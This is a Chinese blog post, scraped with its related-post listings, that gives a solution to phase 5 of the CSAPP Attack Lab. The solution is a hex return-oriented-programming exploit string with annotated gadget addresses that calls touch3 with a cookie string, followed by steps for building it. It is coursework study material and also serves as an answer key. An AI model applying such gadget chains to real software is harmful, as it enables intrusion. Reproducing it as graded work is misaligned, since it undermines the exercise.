attacklab_phase5

最新推荐文章于 2023-06-09 15:38:13 发布
最新推荐文章于 2023-06-09 15:38:13 发布
阅读量718 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w112348/article/details/107044636
版权

答案之一: 

00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
06 1a 40 00 /* 1 <addval_190> movq %rsp,%rax */ 
00 00 00 00
a2 19 40 00 /* 2 <addval_273> movq %rax,%rdi */
00 00 00 00
ab 19 40 00 /* 3 <addval_219> popq %rax */
00 00 00 00
48 00 00 00 /* bias */
00 00 00 00
dd 19 40 00 /* 4 <getval_481> movl %eax,%edx */ 
00 00 00 00
69 1a 40 00 /* 5 <getval_311> movl %edx,%ecx */ 
00 00 00 00
13 1a 40 00 /* 6 <addval_436> movl %ecx,%esi */ 
00 00 00 00
d6 19 40 00 /* 7 <add_xy> lea (%rdi,%rsi,1),%rax */ 
00 00 00 00
a2 19 40 00 /* 8 <addval_273> movq %rax,%rdi */ 
00 00 00 00
fa 18 40 00 /* address of function touch3 */
00 00 00 00
35 39 62 39 /* cockie string */ 
39 37 66 61
00

总结一下步骤:

1. 反汇编,把汇编代码拷贝到IDE中

2. 搜索指令关键字,找出所有能够使用的代码片段,并记录在纸上

3. 考虑指令的相互组合,分析破解方法。可以发现,有关rsp的语句和popq的语句很少,而它们又必不可少,由此找到突破口

4. 先按顺序写好指令,再计算bias。这里的计算非常容易出错,要注意把%rsp拷贝给%rax的时候,%rsp已经比原来增加了0x28+0x8(0x40是程序分配的字符串缓冲区大小,0x8是执行一次ret后的效果)

w112348
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【深入理解计算机系统csapp labattacklab
hazel1313的博客
11-19 1194
Attack lab Attack lab的handout写的非常详细,容易上手。一共分为两部分:第一部分是code injection attack,有3个phase;第二部分是return-oriented programming,需要在已有的程序里找需要执行的指令来完成整个程序,有2个phasePhase 1: 在这部分需要做的工作很简单,利用缓存区溢出,把位于getbuf栈帧底部的返回地址改为函数touch1的地址即可。 在反汇编的代码中找到getbuf函数: 00000000004017a8
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
AttackLab5
Yinger_2000的博客
10-30 796
这是我设计的栈。蓝字圈圈内的数字是farm里相应地址与函数首地址之间的偏移。 然后反汇编找到所有gadget i 的地址 据此写了hex1,运行时却有报错 在0x555555555d96处出了问题 调回去看反汇编,发现这个地方是gadget1的ret,说明是从gadget1跳转到gadget2时出了问题 ...
CSAPP attacklab
weixin_43409270的博客
07-15 480
CSAPP attacklab attacklab总共有5个小实验,主要是围绕CSAPP这本书的3.10节内容展开,即缓冲区溢出攻击。 缓冲区溢出攻击:调用其他过程时当前%rip会存放在运行时栈上,通过缓冲区漏洞,可以修改ret时的%rip,使其指向恶意代码处。 实验的第一部分有3个小实验,主要是在ctarget上完成,代码没有任何缓冲区溢出保护:主要指每次运行ctarget,栈地址是不变的,所以code-injection(CI)十分容易进行。 主要方法是利用gdb调试工具,查看运行时栈的地址,然后就可以
csapp attack lab level5
qq_25044201的博客
12-09 572
做完了第一个ROP来看看第二个,当然这个显然很难。 显然这个和touch3一样,但是无法注入,所以只能用ret来连接gadget,我刚开始看第一个建议很疑惑,为啥要复习movl。直到我从farm这个函数反汇编后所能用到的指令真是少的可怜。如图 ...
CSAPP - AttackLab实验(阶段1-5)
最新发布
Jerome_Tong的博客
06-09 4132
官网:http://csapp.cs.cmu.edu/3e/labs.html“AttackLab”是一个Linux下的可执行C程序,包含了5个阶段(phase1~phase5)的不同内容。程序运行过程中,要求学生能够根据缓冲区的工作方式和程序的反汇编代码来确定攻击字符串长度和字符串中的键内容。每次成功实现缓冲区溢出攻击时都会有提示相应内容,如果攻击失败则单纯的提示segmentation fault相信息。
Simu_Phase_5.rar_5 phase
09-24
"5_phase"标签进一步确认了这是有项目五个阶段中的最后一个阶段。压缩包内的文件"Simu_Phase_5.mdl"可能是使用特定建模工具(如MATLAB Simulink)创建的模型文件,用于模拟该阶段的工作流程或系统行为。 在IT行业...
phase.rar_phase_phase signal_phase space
07-15
标题中的"phase.rar_phase_phase signal_phase space"暗示了我们讨论的主题是于信号处理中的相位(phase)概念,特别是相位空间(phase space)的分析。在这个领域,相位不仅乎信号的基本特性,如频率和振幅,还...
Simu_Phase_1.rar_phase plan
09-19
5. **仿真设置(Simulation Setup)**:这部分涉及配置模拟参数,如时间步长、仿真时间、初始条件和边界条件。这些设置会影响模拟结果的准确性和效率。 6. **仿真运行(Simulation Run)**:在设置完成后,可以运行...
PHASE_MODULATION.zip_phase_phase modulation
07-14
TO PLOT THE PHASE MODULATION SCHEME
relPhaseFromIQ_IQ_phase_beautifuld5y_
10-01
这个压缩包文件"relPhaseFromIQ_IQ_phase_beautifuld5y_"涉及到的是从基带数据中提取实部(Real)和虚部(Imaginary)值的过程,以及可能与之相的相位分析。"beautifuld5y"可能是对程序或数据美观性或者特定版本的...
SeedLab5: The Mitnick Attack Lab
Rachel_IS的博客
01-19 2686
PS:这个Lab最好在Sniffing_Spoofing Lab(熟悉Scapy的sniff和spoof语法)和TCP/IP Attack Lab之后进行 文档之前有一大段介绍,黑客Kevin Mitnick进行了TCP会话劫持攻击,他的步骤是: 1.对服务器进行SYN洪泛攻击,使其无法接受TCP连接请求而静默 2.伪造TCP连接(因为被害者主机会把正常的SYN ACK包发回到静默的服务器,也无法进行嗅探,黑客需要预测对方发回的Sequence number) 3.将建立的TCP连接用于远程登录(rsh),
CSAPP的AttackLab
F_Arisa的博客
01-09 602
AttackLab的实验记录。 ctarget有3个使用代码注入(code-injection)的实验。 rtarget有2个使用面向返回编程(return-oriented-programming)的实验。 代码注入很简单,就是把自己的指令代码写到缓冲区,然后修改返回地址为注入代码的地址即可,但通常会因为栈随机化和标记可执行代码段而失效。 ROP简单来说就是在已有程序中拼凑出自己需要的指令。通过缓冲区溢出输入不同的指令地址,再通过不断地ret来执行不同片段的指令(叫做gadget)。 文章目录phas
CSAPP: Attacklab
Rachel_IS的博客
11-21 2291
命运多舛的attacklab 从上周卡到今天,愣是卡死在phase2 一度以为这次要gg了… 不过今天心理学课灵感大开!!瞬间写完!!开心???????????????? 来总结一下曲折的经历叭~ 这个lab真的能让人学会很多gdb的操作 先objdump -d 出需要的反汇编代码 先简要描述一下这个lab在干什么: 有一个函数getbuf通过调用Gets 获得你输入的字符串,你可以利用栈溢出修改返回地址和进行一系列操...
attack lab(CSAPP-CMU)
qq_29339003的博客
12-05 1827
实验原网址:csapp.cs.cmu.edu/3e/labs.html 一、实验背景和要求 1.实验包含文件 2.任务: 1)对没有进行栈溢出攻击防御的程序“ctarget”使用“代码注入”的方式进行攻击,改变其行为。分别使其直接调用touch1函数;使其为带普通参数的touch2函数设置好参数,并调用;使其为带指针参数的touch3函数设置好参数,并调用; 2)对已经采用了”栈...
attacklab笔记
bysoulwarden的博客
05-14 1984
做完attacklab记点什么,防止以后什么都不记得了。phase1-3用getbuf读取字符串,但不检测栈溢出,正常的gets()在返回前会call一个check函数,检查栈溢出。在lab里通过栈溢出顶掉返回地址,把返回地址变成栈的地址,inject代码到getbuf的栈里或到上层的栈里。在这个过程中明显感受到代码和栈和数据都是在一个地址空间里。phase4-5中增加了两种防止栈溢出的机制:1....
计算机系统基础实验 AttackLab
凌阳的博客
06-18 2766
本文是作者的作业备份,仅作参考,不可照搬抄袭!本实验分为五个阶段,ctarget的三个使用的是CI(code-injection),rtarget的两个阶段使用的是ROP(return-oriented-programming),如表1所示ctarget和rtarget都是用getbuf函数从标准输入读入字符串,getbuf函数定义如下:函数Gets类似于标准库函数gets,从标准输入读入一个字符串(以’\n’或者end-of-file结束),将字符串(带null结束符)存储在指定的目的地址。从这段代码可以
二、Attack Lab
weixin_44519904的博客
08-11 287
​ ​ 利用缓冲区溢出来注入攻击代码.通常,给程序输入字符串,其包含可执行代码的字节编码,一些攻击代码可能会覆盖栈中的返回地址,那么,执行ret指令的效果就是转跳到攻击代码.​ ​ 当栈随机化或者限制可执行代码区域时,就可以使用该方法执行攻击代码(因为返回地址不可知),也就是利用程序本身的代码攻击程序,带有ret指令段的称谓gadget.(例子可以查看帮助文档ROP部分)​ ​call指令将返回地址压入堆栈,再把被调用过程的地址复制到指令指针寄存器(rip).当过程准备返回时,它的ret。...
深入理解操作系统实验——bomb lab(phase_5)
君陌的博客
11-24 2880
5、对phase_5破解 得到phase_5的汇编代码,进行破解 push %ebx sub $0x18,%esp mov 0x20(%esp),%ebx mov %ebx,(%esp) call 804904b <string_length> cmp $0x6,%eax je 8048e07 <phase_5+0x1a> call ...
uvm main_phase 和 run_phase
04-05
UVM中的main_phase和run_phase是两个不同的阶段,但它们之间存在一定的系。 main_phase是UVM中的默认顶层阶段,用于执行系统级别的初始化和清理操作。main_phase仅执行一次,在整个测试执行期间保持活动状态。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值